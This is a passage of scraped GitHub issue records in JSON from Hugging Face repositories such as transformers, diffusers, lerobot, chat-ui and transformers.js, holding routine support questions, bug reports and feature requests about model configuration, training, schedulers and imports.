\r\n\r\n \r\n\r\n\r\n\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/933", "state": "open", "labels": [ "question" ], "created_at": "2024-09-16T20:26:02Z", "updated_at": "2024-09-17T19:35:26Z", "user": "Joseff-Evans" }, { "repo": "huggingface/chat-ui", "number": 1472, "title": "Mistral api configuration without Cloudflare", "body": "I'd like to setup a local deployment using **only the mistral API**: https://docs.mistral.ai/api.\r\n\r\nCan i use ChatUI without an HF deployment and Cloudflare account?\r\n\r\nI leave the .env unchanged and overwrite the env.local with the following code\r\n\r\n```yml\r\nAGENT_ID=\r\nMISTRAL_API_KEY==\r\nMODELS='[\r\n {\r\n \"name\": \"mistral-large\",\r\n \"displayName\": \"mistralai\",\r\n \"description\": \"Mistral standard\",\r\n \"websiteUrl\": \"https://docs.mistral.ai/\",\r\n \"preprompt\": \"\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"top_k\": 5,\r\n \"stream\": true,\r\n \"agent_id\": \"{AGENT_ID}\",\r\n \"tool_choice\": \"auto\",\r\n \"max_new_tokens\": 4096\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.mistral.ai/v1\",\r\n \"defaultHeaders\": {\r\n \"Authorization\": \"Bearer {MISTRAL_API_KEY}\"\r\n }\r\n }\r\n ]\r\n },\r\n {\r\n \"name\": \"mistral-embed\",\r\n \"displayName\": \"Mistral-embedbedings\",\r\n \"description\": \"Mistral embedding model.\",\r\n \"chunkCharLength\": 1024,\r\n \"endpoints\": [\r\n {\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.mistral.ai/v1\",\r\n \"defaultHeaders\": {\r\n \"Authorization\": \"Bearer {MISTRAL_API_KEY}\"\r\n }\r\n }\r\n ]\r\n }\r\n]'\r\nMONGODB_URL=mongodb://localhost:27017/\r\nPUBLIC_APP_ASSETS=chatui\r\nPUBLIC_APP_COLOR=blue\r\nPUBLIC_APP_NAME=\"Mistral Local\"\r\n```\r\nNot quite sure though if the agend_id is overwritten by the \"name\". ", "url": "https://github.com/huggingface/chat-ui/issues/1472", "state": "open", "labels": [ "support" ], "created_at": "2024-09-16T18:51:09Z", "updated_at": "2024-09-17T08:43:40Z", "comments": 0, "user": "JonasMedu" }, { "repo": "huggingface/transformers.js", "number": 932, "title": "Best small model for text generation? ", "body": "### Question\n\nI'm looking to build a AI Journaling app that helps you reflect from your journal entries\r\n\r\nI'm looking for a model like (GPT or Claude) that will take the selected text and provide insights based on a prompt I provide\r\n\r\nIn this case the prompt will provide suggestions based on psychology techniques like CBT and ACT to help you with your life.\r\n\r\nAny ideas on which small model will be able to accomplish this? I've tried GPT2, t5- small, and I couldn't get Phi-3 to work", "url": "https://github.com/huggingface/transformers.js/issues/932", "state": "open", "labels": [ "question" ], "created_at": "2024-09-16T18:06:23Z", "updated_at": "2024-09-26T08:06:35Z", "user": "iamhenry" }, { "repo": "huggingface/distil-whisper", "number": 149, "title": "How to load using openai-whisper package to load the model?", "body": "How to load using openai-whisper package to load the model?", "url": "https://github.com/huggingface/distil-whisper/issues/149", "state": "open", "labels": [], "created_at": "2024-09-15T15:08:46Z", "updated_at": "2024-09-15T15:08:46Z", "user": "lucasjinreal" }, { "repo": "huggingface/competitions", "number": 40, "title": "How to modify the competition", "body": "Hi! I created a new competition using the [tool given here](https://huggingface.co/spaces/competitions/create). All good up till here.\r\nThen I had the space automatically running. To modify the competition, I cloned the repository of the space locally with the command given on the UI\r\n```\r\ngit clone https://huggingface.co/spaces/cmdgentest/commandgen\r\n```\r\nWhen I inspected the contents, it had only two files - `Dockerfile` and `README.md`. This was surprising as i expected the files mentioned [here](https://huggingface.co/docs/competitions/en/competition_repo).\r\nHowever, I still created these files myself and pushed the changes to the spaces repo. Once the space was restarted and running, I still wasn't able to see the changes I made.\r\n\r\nAt this point I am confused where exactly should I put files like `conf.json` in my case.", "url": "https://github.com/huggingface/competitions/issues/40", "state": "closed", "labels": [ "stale" ], "created_at": "2024-09-15T13:45:26Z", "updated_at": "2024-10-08T15:06:28Z", "user": "dakshvar22" }, { "repo": "huggingface/speech-to-speech", "number": 101, "title": "I am really really curious about how to set up this project on a server to serve multiple users. I have been trying for a long time but haven't come up with a very good solution.", "body": "", "url": "https://github.com/huggingface/speech-to-speech/issues/101", "state": "open", "labels": [], "created_at": "2024-09-15T13:42:18Z", "updated_at": "2025-02-04T15:44:31Z", "user": "demoBBB" }, { "repo": "huggingface/transformers", "number": 33489, "title": "passing past_key_values as a tuple is deprecated, but unclear how to resolve", "body": "### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\r\n\r\n- `transformers` version: 4.44.2\r\n- Platform: Linux-5.4.0-167-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.24.7\r\n- Safetensors version: 0.4.5\r\n- Accelerate version: 0.34.2\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.1.1+cu121 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: NA\r\n- Using GPU in script?: yes\r\n- GPU type: NVIDIA A40\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nimport torch\r\nfrom datasets import load_dataset\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, TrainingArguments\r\nfrom trl import SFTTrainer, SFTConfig\r\nfrom accelerate import Accelerator\r\nfrom peft import LoraConfig\r\nimport math, os, random\r\nfrom datetime import datetime\r\n\r\n# Select rows to train on\r\ninitial_rows = 50000\r\nannealing_rows = 10000\r\neval_rows = 10000 # Only 10000 rows for evaluation\r\n\r\nbatch_size = 8\r\nga = 4\r\n\r\nlearning_rate=1e-3\r\n\r\ndef setup_environment():\r\n os.environ['WANDB_DISABLED'] = 'true'\r\n return Accelerator()\r\n\r\ndef load_model_and_tokenizer():\r\n model_name = \"Trelis/80M-0.0090-cosmopedia\"\r\n model_kwargs = {\r\n \"torch_dtype\": torch.bfloat16,\r\n }\r\n tokenizer = AutoTokenizer.from_pretrained(\"HuggingFaceTB/SmolLM-360M-Instruct\")\r\n model = AutoModelForCausalLM.from_pretrained(model_name, **model_kwargs)\r\n return model, tokenizer\r\n\r\ndef load_and_preprocess_train_dataset(start_idx, num_rows):\r\n dataset = load_dataset(\"TIGER-Lab/WebInstructSub\", split=\"train\",\r\n streaming=True\r\n )\r\n dataset = dataset.skip(start_idx).take(num_rows)\r\n \r\n def format_instruction(example):\r\n return {\r\n \"messages\": [\r\n {\"role\": \"user\", \"content\": example[\"question\"]},\r\n {\"role\": \"assistant\", \"content\": example[\"answer\"]}\r\n ]\r\n }\r\n \r\n formatted_dataset = dataset.map(format_instruction)\r\n return formatted_dataset\r\n\r\ndef format_instruction_for_trainer(example):\r\n tokenizer = AutoTokenizer.from_pretrained(\"HuggingFaceTB/SmolLM-360M-Instruct\")\r\n \r\n return tokenizer.apply_chat_template(\r\n example[\"messages\"],\r\n truncation=True,\r\n padding=\"max_length\",\r\n max_length=2048,\r\n tokenize=False,\r\n )\r\n\r\ndef load_and_preprocess_eval_dataset():\r\n dataset = load_dataset(\"TIGER-Lab/WebInstructSub\", split=\"train\")\r\n \r\n # Get the total number of rows in the dataset\r\n total_rows = len(dataset)\r\n \r\n # Generate a list of random indices\r\n random_indices = random.sample(range(total_rows), eval_rows)\r\n \r\n # Select the random rows\r\n dataset = dataset.select(random_indices)\r\n \r\n def format_instruction(example):\r\n return {\r\n \"messages\": [\r\n {\"role\": \"user\", \"content\": example[\"question\"]},\r\n {\"role\": \"assistant\", \"content\": example[\"answer\"]}\r\n ]\r\n }\r\n \r\n formatted_dataset = dataset.map(format_instruction, remove_columns=dataset.column_names)\r\n return formatted_dataset\r\n\r\ndef main():\r\n accelerator = setup_environment()\r\n \r\n model, tokenizer = load_model_and_tokenizer()\r\n print(model.device)\r\n \r\n # Combined training dataset (streaming)\r\n total_rows = initial_rows + annealing_rows\r\n train_dataset = load_and_preprocess_train_dataset(0, total_rows)\r\n \r\n # Evaluation dataset (non-streaming, last 1000 rows)\r\n eval_dataset = load_and_preprocess_eval_dataset()\r\n \r\n # Calculate steps\r\n num_epochs = 1\r\n total_steps = (total_rows * num_epochs) // (batch_size * ga)\r\n initial_steps = (initial_rows * num_epochs) // (batch_size * ga)\r\n \r\n timestamp = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\r\n run_name = f\"SFT-{total_rows}rows-lr{learning_rate}-{timestamp}\"\r\n \r\n training_args = SFTConfig(\r\n output_dir=f\"./Trelis_local/80M-0.015-cosmopedia-SFT-{run_name}\",\r\n run_name=run_name,\r\n logging_dir=f\"./logs/{run_name}\",\r\n eval_strategy=\"steps\",\r\n save_strategy=\"steps\",\r\n report_to=\"tensorboard\",\r\n num_train_epochs=num_epochs,\r\n per_device_train_batch_size=batch_size,\r\n per_device_eval_batch_size=batch_size,\r\n warmup_steps=20,\r\n logging_steps=int(total_steps * 0.1),\r\n eval_steps=int(total_steps * 0.1),\r\n save_steps=int(total_steps * 0.1),\r\n learning_rate=learning_rate,\r\n bf16=True,\r\n max_steps=total_steps,\r\n gra", "url": "https://github.com/huggingface/transformers/issues/33489", "state": "closed", "labels": [ "bug" ], "created_at": "2024-09-14T13:58:18Z", "updated_at": "2025-11-29T04:50:43Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/lerobot", "number": 436, "title": "Image storage format", "body": "I am quite interested in using `LeRobotDataset` for large scale training. I am interested to get more context on the options for storing images so I am aware of the implications this might have:\r\n- Did you by chance study if the mp4 video compression has any negative effects on the image quality in terms of model performance (or any studies you based your decision on)\r\n- I see atm lerobot supports storing images either in `.mp4` or `.pt`, but not in `arrow` or `parquet` format as many other HF datasets do. Is there any specific reason you didn't add support for `arrow` / `parquet` which also provide memory mapping? Any ideas how pytorch would compare to `arrow` / `parquet` when using datasets of 100s of millions of examples?\r\n", "url": "https://github.com/huggingface/lerobot/issues/436", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2024-09-12T16:38:21Z", "updated_at": "2025-10-23T02:29:14Z", "user": "nikonikolov" }, { "repo": "huggingface/lerobot", "number": 435, "title": "Open-X datasets", "body": "Thanks for the great work! I am interested in converting more of the open-x datasets to `LeRobotDataset`.\r\n- I was wondering if there was any particular reason the entire open-x wasn't added already, e.g. some difficulties you encountered with some specific datasets?\r\n- Do you have any tips where I should be extra careful when converting from RLDS to `LeRobotDataset` or it's generally as easy as calling the conversion script?", "url": "https://github.com/huggingface/lerobot/issues/435", "state": "closed", "labels": [ "enhancement", "question", "dataset" ], "created_at": "2024-09-12T16:29:40Z", "updated_at": "2025-10-08T08:25:55Z", "user": "nikonikolov" }, { "repo": "huggingface/lerobot", "number": 432, "title": "some questions about real world env", "body": "### System Info\n\n```Shell\nall software cfg match author's project\n```\n\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am planning to control my own robot left-arm. I've almost figure out all the parts if lerobot-dataset, then I want to make my own dataset respect to the aloha_sim_transfer_cube_human rather than \"korch ALOHA teleop hardware system\".\r\nmy questions are:\r\n1) Must I keep such a high fps like 50 when collect data from camera and arm actions?\r\n2) actions comes from human control on the arm, and state comes from reading operation, but how should I set the time gap between action and state?\n\n### Expected behavior\n\nanswers from anyone", "url": "https://github.com/huggingface/lerobot/issues/432", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-12T09:53:23Z", "updated_at": "2025-10-08T08:27:48Z", "user": "NNsauce" }, { "repo": "huggingface/chat-ui", "number": 1463, "title": "Some bugs", "body": "## Bug description\r\n\r\nThere are several issues that I have with the site, such as slow performance both on mobile and PC. When trying to select specific parts of the text, it goes back to the original message. Sometimes it occurs in errors that force me to always refresh the conversation. When I switch conversation I have to switch all of my messages to the latest ones.\r\nBut I feel it's not my internet that's causing the issue but something on the website.\r\n\r\n## Steps to reproduce\r\n\r\nThe performance is quite mixed, but on mobile is unplayable. (Samsung A40)\r\nTry to select any text, and it will direct you to the first message.\r\nThe last one I don't how to replicate except being unlucky with it.\r\n\r\n\r\n### Specs\r\n\r\n- **Windows 11**:\r\n- **Librewolf 124.0.1-1**:\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1463", "state": "open", "labels": [ "bug" ], "created_at": "2024-09-12T08:13:35Z", "updated_at": "2024-09-12T09:03:58Z", "comments": 0, "user": "Ruyeex" }, { "repo": "huggingface/transformers.js", "number": 929, "title": "what is pipeline?", "body": "", "url": "https://github.com/huggingface/transformers.js/issues/929", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-12T05:09:05Z", "updated_at": "2024-10-04T10:24:42Z", "user": "chakravarthi-vatala" }, { "repo": "huggingface/diffusers", "number": 9417, "title": "Suggestion for speeding up `index_for_timestep` by removing sequential `nonzero()` calls in samplers", "body": "**Is your feature request related to a problem? Please describe.**\r\nFirst off, thanks for the great codebase and providing so many resources! I just wanted to provide some insight into an improvement I made for myself, in case you'd like to include it for all samplers. I'm using the `FlowMatchEulerDiscreteScheduler` and after profiling, I've noticed that it's unexpectedly slowing down my training speeds. I'll describe the issue and proposed solution here rather than making a PR, since this would touch a lot of code and perhaps someone on the diffusers team would like to implement it.\r\n\r\n**Describe the solution you'd like.**\r\nThis line in particular is very slow because it is a for loop `step_indices = [self.index_for_timestep(t, schedule_timesteps) for t in timestep]` and the `self.index_for_timestep()` is calling a nonzero() function which is slow.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/b9e2f886cd6e9182f1bf1bf7421c6363956f94c5/src/diffusers/schedulers/scheduling_flow_match_euler_discrete.py#L149\r\n\r\n**Describe alternatives you've considered.**\r\nI've changed the code as follows:\r\n\r\n```python\r\n# huggingface code\r\ndef index_for_timestep(self, timestep, schedule_timesteps=None):\r\n if schedule_timesteps is None:\r\n schedule_timesteps = self.timesteps\r\n\r\n indices = (schedule_timesteps == timestep).nonzero()\r\n\r\n # The sigma index that is taken for the **very** first `step`\r\n # is always the second index (or the last index if there is only 1)\r\n # This way we can ensure we don't accidentally skip a sigma in\r\n # case we start in the middle of the denoising schedule (e.g. for image-to-image)\r\n pos = 1 if len(indices) > 1 else 0\r\n\r\n return indices[pos].item()\r\n```\r\n\r\nchanged to =>\r\n\r\n```python\r\n# my code\r\ndef index_for_timestep(self, timestep, schedule_timesteps=None):\r\n if schedule_timesteps is None:\r\n schedule_timesteps = self.timesteps\r\n\r\n num_steps = len(schedule_timesteps)\r\n start = schedule_timesteps[0].item()\r\n end = schedule_timesteps[-1].item()\r\n indices = torch.round(((timestep - start) / (end - start)) * (num_steps - 1)).long()\r\n\r\n return indices\r\n```\r\n\r\nand\r\n\r\n```python\r\n# huggingface code\r\n# self.begin_index is None when scheduler is used for training, or pipeline does not implement set_begin_index\r\nif self.begin_index is None:\r\n step_indices = [self.index_for_timestep(t, schedule_timesteps) for t in timestep]\r\n```\r\n\r\nchanged to =>\r\n\r\n```python\r\n# my code\r\n# self.begin_index is None when scheduler is used for training, or pipeline does not implement set_begin_index\r\nif self.begin_index is None:\r\n step_indices = self.index_for_timestep(timestep, schedule_timesteps)\r\n```\r\n\r\n**Additional context.**\r\nJust wanted to bring this modification to your attention since it could be a training speedup for folks. \ud83d\ude42 Especially when someone has a large batch size > 1 and this for loop it occurring with nonzero search operations. Some other small changes might be necessary to ensure compatibility of the function changes, but I suspect it could help everyone. Thanks for the consideration!\r\n", "url": "https://github.com/huggingface/diffusers/issues/9417", "state": "open", "labels": [ "help wanted", "wip", "contributions-welcome", "performance" ], "created_at": "2024-09-11T14:54:37Z", "updated_at": "2025-02-08T10:26:47Z", "comments": 11, "user": "ethanweber" }, { "repo": "huggingface/cosmopedia", "number": 29, "title": "What is the best way to cite the work?", "body": "This is absolutely fantastic work. Thank you very much for making it public. \r\n\r\nWhat is the best way to cite this dataset/project? Is there any paper I can cite or should I cite the blog-post?", "url": "https://github.com/huggingface/cosmopedia/issues/29", "state": "closed", "labels": [], "created_at": "2024-09-11T14:34:54Z", "updated_at": "2024-09-11T14:36:15Z", "user": "vijetadeshpande" }, { "repo": "huggingface/diffusers", "number": 9416, "title": "[Schedulers] Add SGMUniform", "body": "Thanks to @rollingcookies, we can see in this [issue](https://github.com/huggingface/diffusers/issues/9397) that this schedulers works great with the Hyper and probably also Lighting loras/unets.\r\n\r\nIt'd be fantastic if someone can contribute this scheduler to diffusers. \r\n\r\nPlease let me know if someone is willing to do this.", "url": "https://github.com/huggingface/diffusers/issues/9416", "state": "closed", "labels": [ "help wanted", "contributions-welcome", "advanced" ], "created_at": "2024-09-11T13:59:27Z", "updated_at": "2024-09-23T23:39:56Z", "comments": 12, "user": "asomoza" }, { "repo": "huggingface/transformers", "number": 33416, "title": "The examples in the examples directory are mostly for fine-tuning pre-trained models\uff1fhow to trian from scratch", "body": "### Model description\n\nno \n\n### Open source status\n\n- [X] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/33416", "state": "open", "labels": [ "New model" ], "created_at": "2024-09-11T03:32:53Z", "updated_at": "2024-10-03T23:28:42Z", "user": "zc-Chao" }, { "repo": "huggingface/diffusers", "number": 9407, "title": "callback / cannot yield intermediate images on the fly during inference", "body": "Hi, \r\n\r\nin advance apologies if this has been asked already, or if I'm just misusing the diffusers API.\r\n\r\nUsing `diffusers==0.30.2`\r\n\r\n**What API design would you like to have changed or added to the library? Why?**\r\n\r\nI will illustrate straight away the general issue with my use case: I need to call a (FLUX) diffusers pipeline from some endpoint of mine, passing a callback that decodes latents and saves on disk intermediate images obtained from them, at the end of each step. So far, so good: I do manage to get the intermediate images saved on disk. I do this using the pipeline argument `callback_on_step_end`\r\n\r\nNow, I'd like to _**yield**_ (in the pythonic meaning) these intermediate images on the fly, as soon as they're available, ie at the end of each inference step. I need to do so from my endpoint. That's where my problem is.\r\n\r\nI could not make this idea work using with diffusers callback mechanism.\r\nI mean, I did manage that by subclassing the pipeline, copy-pasting the dunder call method code and overriding it, but this is not maintainable, especially since the FLUX code evolves rapidly nowadays.\r\nAlso, note that currently diffusers assigns the result of the call to the callback to a variable and expects it to implement the `.pop` method, which might add constraints (diffusers typically expects a kwarg dict, see [here](https://github.com/huggingface/diffusers/blob/v0.30.2/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L1026)).\r\n\r\nAnother approach I thought of is to monitor the disk contents in a parallel process during the call to the pipeline.\r\n\r\nBut is there an easier way?\r\n\r\n\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\n\r\n\r\nThis allows to manipulate the objects produced by the callback live, instead of having to wait for the whole reverse diffusion to finish.\r\n\r\n\r\nThank you\r\n\r\ncc @sayakpaul @yiyixuxu\r\n\r\nalso tagging @asomoza since I saw he is the contributor to the official callback interface\r\n", "url": "https://github.com/huggingface/diffusers/issues/9407", "state": "closed", "labels": [], "created_at": "2024-09-10T16:32:04Z", "updated_at": "2024-09-25T12:28:20Z", "comments": 8, "user": "Clement-Lelievre" }, { "repo": "huggingface/transformers.js", "number": 928, "title": "The inference speed on the mobile end is a bit slow", "body": "### Question\r\n\r\nIf it is a mobile device that does not support WebGPU, how can we improve the inference speed of the model? I have tried WebWorker, but the results were not satisfactory", "url": "https://github.com/huggingface/transformers.js/issues/928", "state": "open", "labels": [ "question" ], "created_at": "2024-09-10T09:14:16Z", "updated_at": "2024-09-11T08:46:33Z", "user": "Gratifyyy" }, { "repo": "huggingface/transformers.js", "number": 927, "title": "Error with Using require for ES Modules in @xenova/transformers Package", "body": "### Question\n\ntrying to use require to import the Pipeline class from the @xenova/transformers package, but encounter the following error:\r\n\r\nconst { Pipeline } = require('@xenova/transformers');\r\n^\r\n\r\nError [ERR_REQUIRE_ESM]: require() of ES Module D:\\Z-charity\\dating_app_backend\\node_modules@xenova\\transformers\\src\\transformers.js from D:\\Z-charity\\dating_app_backend\\controllers\\authController.js not supported.\r\nInstead change the require of transformers.js in D:\\Z-charity\\dating_app_backend\\controllers\\authController.js to a dynamic import() which is available in all CommonJS modules.\r\nat Object. (D:\\Z-charity\\dating_app_backend\\controllers\\authController.js:10:22) {\r\ncode: 'ERR_REQUIRE_ESM'\r\n\r\nIssue with Dynamic Import\r\n\r\nconst getPipeline = async () => {\r\nconst { Pipeline } = await import('@xenova/transformers');\r\nreturn new Pipeline('text-classification', 'xenova/bert-base-uncased');\r\n};\r\n\r\n{\r\n\"message\": \"Server error\",\r\n\"error\": \"Must implement _call method in subclass\"\r\n}\r\n\r\nReproduction\r\ntrying to use require to import the Pipeline class from the @xenova/transformers package, but encounter the following error:\r\n\r\nconst { Pipeline } = require('@xenova/transformers');\r\n^\r\n\r\nError [ERR_REQUIRE_ESM]: require() of ES Module D:\\Z-charity\\dating_app_backend\\node_modules@xenova\\transformers\\src\\transformers.js from D:\\Z-charity\\dating_app_backend\\controllers\\authController.js not supported.\r\nInstead change the require of transformers.js in D:\\Z-charity\\dating_app_backend\\controllers\\authController.js to a dynamic import() which is available in all CommonJS modules.\r\nat Object. (D:\\Z-charity\\dating_app_backend\\controllers\\authController.js:10:22) {\r\ncode: 'ERR_REQUIRE_ESM'\r\n\r\nIssue with Dynamic Import\r\n\r\nconst getPipeline = async () => {\r\nconst { Pipeline } = await import('@xenova/transformers');\r\nreturn new Pipeline('text-classification', 'xenova/bert-base-uncased');\r\n};\r\n\r\n{\r\n\"message\": \"Server error\",\r\n\"error\": \"Must implement _call method in subclass\"\r\n}\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/927", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-10T06:02:53Z", "updated_at": "2024-12-08T19:17:31Z", "user": "qamarali205" }, { "repo": "huggingface/transformers.js", "number": 925, "title": "V3 - WebGPU Whisper in Chrome Extention", "body": "### Question\n\nCan [webGPU accelerated whisper](https://huggingface.co/spaces/Xenova/whisper-webgpu) run in a chrome extension?\r\n\r\nI checked the space and found the dependency `\"@xenova/transformers\": \"github:xenova/transformers.js#v3\"` which I imported in a chrome extension. When I tried to import it, it didn't work.\r\n\r\n```\r\nModule not found: Error: Can't resolve '@xenova/transformers' in 'D:\\projects\\mosaic8\\browser-extension\\src\\utils' \r\nresolve '@xenova/transformers' in 'D:\\projects\\mosaic8\\browser-extension\\src\\utils'\r\n Parsed request is a module\r\n using description file: D:\\projects\\mosaic8\\browser-extension\\package.json (relative path: ./src/utils)\r\n Field 'browser' doesn't contain a valid alias configuration\r\n resolve as module\r\n D:\\projects\\mosaic8\\browser-extension\\src\\utils\\node_modules doesn't exist or is not a directory\r\n D:\\projects\\mosaic8\\browser-extension\\src\\node_modules doesn't exist or is not a directory\r\n D:\\projects\\mosaic8\\browser-extension\\node_modules doesn't exist or is not a directory\r\n looking for modules in D:\\projects\\mosaic8\\node_modules\r\n single file module\r\n using description file: D:\\projects\\mosaic8\\package.json (relative path: ./node_modules/@xenova/transformers)\r\n no extension\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers is not a file\r\n .ts\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.ts doesn't exist\r\n .tsx\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.tsx doesn't exist\r\n .js\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.js doesn't exist\r\n .jsx\r\n Field 'browser' doesn't contain a valid alias configuration\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers.jsx doesn't exist\r\n existing directory D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\r\n using description file: D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\package.json (relative path: .)\r\n using exports field: ./dist/transformers.js\r\n using description file: D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\package.json (relative path: ./dist/transformers.js)\r\n no extension\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js doesn't exist\r\n .ts\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.ts doesn't exist \r\n .tsx\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.tsx doesn't exist \r\n .js\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.js doesn't exist \r\n .jsx\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js.jsx doesn't exist \r\n as directory\r\n D:\\projects\\mosaic8\\node_modules\\@xenova\\transformers\\dist\\transformers.js doesn't exist\r\n```\r\n\r\nI might be doing something I don't know maybe. What could the issue here be?\r\n\r\nWhat I can understand is that it is trying to search for a ts/tsx/js/jsx file (as specified in the `webpack.config.js` and it is unable to get it.", "url": "https://github.com/huggingface/transformers.js/issues/925", "state": "open", "labels": [ "question" ], "created_at": "2024-09-10T02:52:41Z", "updated_at": "2025-01-18T16:03:26Z", "user": "chandeldivyam" }, { "repo": "huggingface/diffusers", "number": 9402, "title": "[Flux ControlNet] Add img2img and inpaint pipelines", "body": "We recently added img2img and inpainting pipelines for Flux thanks to @Gothos contribution. \r\n\r\nWe also have controlnet support for Flux thanks to @wangqixun.\r\n\r\nIt'd be nice to have controlnet versions of these pipelines since there's been requests to have them.\r\n\r\nBasically, we need to create two new pipelines that add the controlnet support from this [pipeline ](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_controlnet.py) to the corresponding pipellines.\r\n\r\n- [X] [Image to image](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_img2img.py)\r\n- [X] [Inpaint](https://github.com/huggingface/diffusers/blob/f28a8c257afe8eeb16b4deb973c6b1829f6aea59/src/diffusers/pipelines/flux/pipeline_flux_inpaint.py)\r\n\r\nRelated issue: #9158 \r\n\r\nLet me know if someone is interested in contributing this.", "url": "https://github.com/huggingface/diffusers/issues/9402", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2024-09-10T02:08:32Z", "updated_at": "2024-10-25T02:22:19Z", "comments": 11, "user": "asomoza" }, { "repo": "huggingface/transformers.js", "number": 924, "title": "Steps for suppressing strings", "body": "### Question\n\nWhat is the syntax for suppressing strings from showing up in the output text? Should I be doing that in my code, or is there a config option for it? I'm trying to remove everything that isn't a word:\r\n```\r\nconst suppressedStrings = [\r\n \"[BLANK_AUDIO]\",\r\n \"[CLEARS THROAT]\",\r\n \"[Coughing]\",\r\n \"[inaudible]\",\r\n \"[MUSIC]\",\r\n \"[MUSIC PLAYING]\",\r\n \"[Pause]\",\r\n \"(keyboard clicking)\",\r\n];\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/924", "state": "open", "labels": [ "question" ], "created_at": "2024-09-09T21:44:16Z", "updated_at": "2025-01-24T17:53:47Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9395, "title": "[Q] Possibly unused `self.final_alpha_cumprod`", "body": "Hello team, quick question to make sure I understand the behavior of the `step` function in LCM Scheduler.\r\n\r\nhttps://github.com/huggingface/diffusers/blob/a7361dccdc581147620bbd74a6d295cd92daf616/src/diffusers/schedulers/scheduling_lcm.py#L534-L543\r\n\r\nHere, it seems that the condition `prev_timestep >= 0` is always `True`, because `timestep` and `self.timesteps[prev_step_index]` cannot be negative. This would mean that `self.final_alpha_cumprod` is never used. Is there a way in which `prev_timestep` can be negative?", "url": "https://github.com/huggingface/diffusers/issues/9395", "state": "open", "labels": [ "stale" ], "created_at": "2024-09-09T17:35:08Z", "updated_at": "2024-11-09T15:03:23Z", "comments": 7, "user": "fdtomasi" }, { "repo": "huggingface/chat-ui", "number": 1458, "title": "Chat ui sends message prompt 404", "body": "```\r\nMONGODB_URL='mongodb://localhost:27017'\r\nPLAYWRIGHT_ADBLOCKER='false'\r\nMODELS=`[\r\n {\r\n \"name\": \"Local minicpm\",\r\n \"tokenizer\": \"minicpm\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\": \"{{preprompt}}{{#each messages}}{{#ifUser}}<|user|>\\n{{content}}<|end|>\\n<|assistant|>\\n{{/ifUser}}{{#ifAssistant}}{{content}}<|end|>\\n{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"stop\": [\"<|end|>\", \"<|endoftext|>\", \"<|assistant|>\"],\r\n \"temperature\": 0.7,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 3071\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"***/v1/chat/completions\",\r\n \"defaultHeaders\": {\r\n \"x-portkey-config\": '{ \"Authorization\": \"Bearer apikey\" }'\r\n }\r\n }],\r\n },\r\n]`\r\n```\r\nPrompt for the following error\uff1a\r\n\r\n```\r\nERROR (15839): 404 status code (no body)\r\n err: {\r\n \"type\": \"NotFoundError\",\r\n \"message\": \"404 status code (no body)\",\r\n \"stack\":\r\n Error: 404 status code (no body)\r\n at APIError.generate (file:///Users/user/Desktop/chat-ui/node_modules/openai/error.mjs:50:20)\r\n at OpenAI.makeStatusError 